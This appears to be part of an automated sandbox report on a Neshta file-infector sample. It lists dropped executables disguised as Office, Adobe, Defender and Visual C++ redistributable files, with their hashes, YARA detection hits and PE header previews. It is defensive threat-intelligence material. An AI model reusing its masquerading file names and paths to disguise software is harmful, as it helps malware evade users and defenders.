                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):5.388189611386593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJ/jWSlFQQoUmydAHZk6:JxqjQ+P04wsmJCOjTlWFauk6
                                                                                                                        MD5:62A21A597FA5F5C489D266A87694FE61
                                                                                                                        SHA1:8A9C326ABA5638F6B91BA8DD18D258998CC9D25B
                                                                                                                        SHA-256:D35B0D2411B6D5CDE4F61E5EBD70BBB1644AAE5E95EF417E3E885B20C194DE49
                                                                                                                        SHA-512:F4F9F7C8BDCDC7CAC1D491E528E88464A78F6254F44F2C3758860B495E188B607EA2FB2B292CCD82829F1E462EC07BFDD5F0F1729F7083C9FA398FD7EC133E26
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):5.131620925268659
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJDK2sNTXC8cEGV6GskwTO:JxqjQ+P04wsmJCOKZxXk6GskwTO
                                                                                                                        MD5:1F414E9B0D1C3584418658367EC9242F
                                                                                                                        SHA1:5D11420BEB0507F3A71925E2A0A2DC36EA1265DF
                                                                                                                        SHA-256:CEB5DB2FF4B04E0C3683D039DB97ACC145C5FB9DD026A7DC9B84F12D424E9488
                                                                                                                        SHA-512:1AE9A3653B774AACEA8A2CD24ED9BAAD8245967E16122F53099A8A640D6BF5C055651C50B5D83C4EBF962060FE021A274EDBFB818093A783884C9AC6DB822D03
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.4980851403396676
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCHJDYG7YSUhCD8TanIVayX0TfC8cvB11lV:sr85CpDDkSQCfLy0fk11lV
                                                                                                                        MD5:D4811ACDE0C5F48DACC1BBC3E310E8D8
                                                                                                                        SHA1:06F814E81524B40587E503E32B8865D66A8383A6
                                                                                                                        SHA-256:3B5D056392B165F9001BF785E6F91187B75A67F0209E5C189AE0764A66FF3E10
                                                                                                                        SHA-512:6BE82945EAB1E9FD9BA507045B6B45799AFD11F5A3A30949E03FA100F93750DD0ECEBECABDB1883B764C90791ABED09EE191588BB8A8241AC6A6AFAAA120C169
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.57605386644689
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCMfSoIt2ZzzV9uc1EshwMDkEcAv4i+:sr85Cnkz//1DgEcAv5+
                                                                                                                        MD5:100E15577B28178663E63AB854D28B4A
                                                                                                                        SHA1:DC7D931ECDA8C09D0D2B43988E6D689A20E080F1
                                                                                                                        SHA-256:238254BCE07446426D478897AC3DE27DE2B9606B2E8477F7DDAF8A20A2999FC4
                                                                                                                        SHA-512:5F5A2C7F553B747A9A1811E9D4D3A0BDA525D5977D5BB709F65164308E020B31A7EC0029C435D8F05E46E737242BB5F934D0094728841F6C545E15C625444C47
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\misc.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):4.744720269791172
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJozp/q4:JxqjQ+P04wsmJCV/Z
                                                                                                                        MD5:316C81CA54C5FAC241D16CA25E7B341C
                                                                                                                        SHA1:9E1199BCB359EA9146EAD52E765F3913A791CD7A
                                                                                                                        SHA-256:9CE3D752106B78CBB5CF3DF574CD084177C4CF97FF35CC6E983EAD6F4A3F6CE1
                                                                                                                        SHA-512:CEC15054D8351322566F67B46B333F11064CB650D4ADDCDBC9174C66EE4E4D4F1C3400FDE6BBDCD3B632ED051C92E898C5170B1A6504BB11A771230D4EA15D3F
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.422024969420582
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCjMnNFZnBeGI9cKm8q3+i2PPvfKLD1D9nwt:sr85CMBeLsOBXiN9nwt
                                                                                                                        MD5:62F99051442ED97159B8D9CC03BBF8DC
                                                                                                                        SHA1:E22CF810217DFC5700C2C629162EF37CA672C957
                                                                                                                        SHA-256:C83C04BB7EBAC75F623938C167AD7F09606F2E0B786A1CCAFA12E080F9455E9A
                                                                                                                        SHA-512:FE259BC5D8C12884C403B4F08E00272DEBFEECEDF5F9230F8B0A3B6DE100D58AEC610B849DFFD94568A44389FACAF7B55B1631F9AA51BD91B7C1F3C91408619A
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\ProgramData\Adobe\ARM\S\11357\AdobeARMHelper.exe
                                                                                                                        Process:C:\Users\user\Desktop\vi0EwpbUht.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.384524945408535
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCmG2kHtSSHuzUfuNAGt1Uv1JwsxtD:sr85CBNrOEuNAsWJwsD
                                                                                                                        MD5:D0B62E96259230D26E500B5D2F6E2488
                                                                                                                        SHA1:86DA8E18DCCD893874C398FDB41EEE85D766A4EC
                                                                                                                        SHA-256:1E2BC4A5441F740B2E9838EAB3964123A2D358B62E1F124C5F1E8BB4E5AB2319
                                                                                                                        SHA-512:BA4E224F4D5C8A5B5E626A7EEE6F35688528244BD7F9323CF74AF219BFA2AAFBB947DDAFD8ED815F564EDE0403B09CDBB1DEFB0A9CE9753A75C8A1C5E912FAFE
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Adobe\ARM\S\11357\AdobeARMHelper.exe, Author: Florian Roth
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Adobe\ARM\S\11357\AdobeARMHelper.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\ProgramData\Adobe\ARM\S\1742\AdobeARMHelper.exe
                                                                                                                        Process:C:\Users\user\Desktop\vi0EwpbUht.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.384524945408535
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCmG2kHtSSHuzUfuNAGt1Uv1JwsxtD:sr85CBNrOEuNAsWJwsD
                                                                                                                        MD5:D0B62E96259230D26E500B5D2F6E2488
                                                                                                                        SHA1:86DA8E18DCCD893874C398FDB41EEE85D766A4EC
                                                                                                                        SHA-256:1E2BC4A5441F740B2E9838EAB3964123A2D358B62E1F124C5F1E8BB4E5AB2319
                                                                                                                        SHA-512:BA4E224F4D5C8A5B5E626A7EEE6F35688528244BD7F9323CF74AF219BFA2AAFBB947DDAFD8ED815F564EDE0403B09CDBB1DEFB0A9CE9753A75C8A1C5E912FAFE
                                                                                                                        Malicious:true
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
                                                                                                                        Process:C:\Users\user\Desktop\vi0EwpbUht.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.441581793400409
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJbqnf2+Q4NIvym8kig4kZ5vHDRKjwX03:JxqjQ+P04wsmJCEq+l428qjRNX4
                                                                                                                        MD5:E9116F5812E84117738237DE522B5445
                                                                                                                        SHA1:367077F61C829CCA2196A1FB3DD837DCB0933BE2
                                                                                                                        SHA-256:70ED68891E1B8B9EBEBDFAC5E78E5A2C96A494A309E6E86EDFBE1507C1AAFECD
                                                                                                                        SHA-512:B34DA2164DFE64B604B60430A32C6DE6EA99B13D4EF9B972D017977DCCCBE46327FB4BDD9F6FE580816AB277D142780057B5C632A2FDB556AC231E461DC340AB
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe, Author: Florian Roth
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpuser.exe
                                                                                                                        Process:C:\Users\user\Desktop\vi0EwpbUht.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.353925362184326
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJAz1pPYsl4KlIgZaBm/as/2NcLULCTGA:JxqjQ+P04wsmJCvzR4KygN2sTK2U9ON
                                                                                                                        MD5:632E914780CFB9DF4C2C829043D235A1
                                                                                                                        SHA1:042784F1011FB4CF1B596A7822FF5C19C8B8AC78
                                                                                                                        SHA-256:CA7157B577BFDFF1D3A94A441EA14F7AE6039432655980F03D09DA89923D822A
                                                                                                                        SHA-512:E811B185909AB1C986C3F17EBD3C46DEEC158D8AFB14DF2B82881B78C9C94F44D716C340D12D46D80B91AE95AF6DC169DE9ACA1C7AEAC29514ADA24DC519A36E
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpuser.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe
                                                                                                                        Process:C:\Users\user\Desktop\vi0EwpbUht.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.485543952012
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC19QHwtRF9YkjqOOdwtFR+9zAKEC2OoxAwMqc4:sr85C1IyRF9YkjqOOOB8zAK2OoxAwMqx
                                                                                                                        MD5:5BFD09277E78C899F354E5E1144B162A
                                                                                                                        SHA1:41A9E6398CCD75ABF1B0E482A196EA27E6E3E9F1
                                                                                                                        SHA-256:043710D790F7C99AA46C0C6347CC38046AA1B097519DB5F6A257B8E9B5FF578E
                                                                                                                        SHA-512:2EC324783041FF402543E60FF1A8C3A8673AC68CF4FA1AF86D20248FF3874AEAA37DF83380612E49DE8D4FD94D58D4E0CF1888E3ED1B9369C12C60735506A20D
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, Author: Florian Roth
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe
                                                                                                                        Process:C:\Users\user\Desktop\vi0EwpbUht.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.562712500136307
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCzzw4jkfLZTxJtDSoieff:sr85CzEBfLzJtR
                                                                                                                        MD5:4C436BAC03F954F21B3D6192A898EDE3
                                                                                                                        SHA1:1817116645BC8D2C0FB3653694D9DEDB990D4D0A
                                                                                                                        SHA-256:2DFB8EEC68A9B0730567D2E18C9F4FDD2343238C6A2F4CA41750B229D3E3AD38
                                                                                                                        SHA-512:807A1F1D78DA195DF1D714E32C53C610FE3C0E2059BAE0C90C2A2491B48E93CA8D04BB8640CC034EF000F4846016CE4DE5EF7295FDBF72668C30645334F049D6
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, Author: Florian Roth
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe
                                                                                                                        Process:C:\Users\user\Desktop\vi0EwpbUht.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.515754456132426
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCYRnRdeHrI7hzUg2Ewhwy9Lt0+du:sr85CYRnRCr8JUg+t95Ldu
                                                                                                                        MD5:E1BDE940ECE6F7C7F80841740A907C05
                                                                                                                        SHA1:188CE476AF1396E98E7D95EC6B3D22DADC85F9DE
                                                                                                                        SHA-256:B4EDE55B8093B7E5BB26CF08684B3670B7890591FCCFBEC83AF2F79907401239
                                                                                                                        SHA-512:EB025FB6495BC3D34BEDB05ED5120EE1097B9EE8B233A2AA3ED7806802B8DEE0C7F76D0C7A600CB0910BDD2962E4C3695B1D8D31198C85AD7F139F3EFB939979
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe
                                                                                                                        Process:C:\Users\user\Desktop\vi0EwpbUht.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.562807885786494
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCKzw4jkfLZTxJtDSoieff:sr85CKEBfLzJtR
                                                                                                                        MD5:933DB9DADE1B2ADDE200F742940F61C9
                                                                                                                        SHA1:19208F6EE0F07F6BF61A9E8FA04BB6B299A2C512
                                                                                                                        SHA-256:CFA2C4E5DC5AE16C510BC789B478D13F9EC05372DBADCE8C0E78A7DCFC16A3DC
                                                                                                                        SHA-512:B98BDC38BEF6AFB8E6EF2230627290E0110875197625CCE0CC9CFD9A33954AD53F678148935442753E0E2D713DA17FDFD695E997ABFF45FBBCA22BD1F6B1C12D
                                                                                                                        Malicious:true
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                                                                        Process:C:\Users\user\Desktop\vi0EwpbUht.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.51577139672898
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCkRnRdeHrI7hzUg2Ewhwy9Lt0+du:sr85CkRnRCr8JUg+t95Ldu
                                                                                                                        MD5:60738E3D150CFDD2CD11C779ED82C473
                                                                                                                        SHA1:ED9010E56426DD75DA04F45A22C6964A06DB52C0
                                                                                                                        SHA-256:AD8620D29F365145B787B9225905089FA1205A6A67775BD36EE6FF66F9AE56EB
                                                                                                                        SHA-512:F67BBBE6A8134E6342647AA03C7B59C2AA78D224DAE82B11D5EE5FC0B15BE90C30E604411E97E2E4E6E8B28D8424A2C9B0E10A130A5F21B4FA0C6A121A667D63
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe
                                                                                                                        Process:C:\Users\user\Desktop\vi0EwpbUht.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.485564517117053
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCz9QHwtRF9YkjqOOdwtFR+9zAKEC2OoxAwMqc4:sr85CzIyRF9YkjqOOOB8zAK2OoxAwMqx
                                                                                                                        MD5:6A3C227401357DD0ACEE2988511EC44C
                                                                                                                        SHA1:2CB5F9BFC06F902D3B8ADCEBDF7A6DB5E8D1815A
                                                                                                                        SHA-256:67FD35785411A8926559D94CF258C6CC40A1D2683B36CBD3E99124B43D3F4307
                                                                                                                        SHA-512:A2A3F4E5FD748BF74A6CDE8674540AD893F7F8B6FFBD896E81911805DF9E8DC3CCDB832661DA8A7A5505F74EA81863593DDF7CF4759C1028846C4461EA0D8E71
                                                                                                                        Malicious:true
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe
                                                                                                                        Process:C:\Users\user\Desktop\vi0EwpbUht.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):243189
                                                                                                                        Entropy (8bit):7.925477612699072
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:8Qq+a3CstoxrFKLP+BFY0GfiqlMthQtpAp:TayYbyuiqS1p
                                                                                                                        MD5:4A10F66447AAF017229FF618AAB923E3
                                                                                                                        SHA1:97CCC229FE85D8A904152EB5DAF42AA6638A2FB6
                                                                                                                        SHA-256:D2D80FB82C8B5D7315EACC3109C9A108C67A2961402941FDB996094A68E4A21C
                                                                                                                        SHA-512:6AADAFC7FD20CB9FB2FE0BDF47EF78815037C6B9EEDB33DFFE561C623DB89ABE98A7827A9C861C35997EC48207AF855A51CB11145FE888E7039C0265E9146384
                                                                                                                        Malicious:true
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i..iw..iu..i...i..id..i!..i...i...it..iRichu..i........................PE..L......K.................Z...........0.......p....@..........................................................................s.......................................................................................p...............................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data...x............p..............@....ndata.......@...........................rsrc................t..............@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        C:\Users\user\AppData\Local\Temp\96vl4alc03rj
                                                                                                                        Process:C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):186880
                                                                                                                        Entropy (8bit):7.999072130972999
                                                                                                                        Encrypted:true
                                                                                                                        SSDEEP:3072:ntwY1UstoxrHlVRTW4DwtPeqPiWiIAH5AYhJFY0GrbiIplSjb3t3GgJMu:t3CstoxrFKLP+BFY0GfiqlMtJ
                                                                                                                        MD5:0E39AC439A13C08DAC78B74B1D5FDB88
                                                                                                                        SHA1:E5F5EB82DA5789E321207313935DA27B77E24AF3
                                                                                                                        SHA-256:A82F9CD290F5C7647DB9AA379D19386D71CFA82F3DD3775656CDEDFD0341A726
                                                                                                                        SHA-512:FED0E294C1788FFE1D01CD0DBF80D79B4AB3BDF0AACEA605731F796A972D2C55F6C2B7BE88BFC8F62DB4B30F822215AE41FF3F5C1558E96B719BB0EFE0042DFE
                                                                                                                        Malicious:false
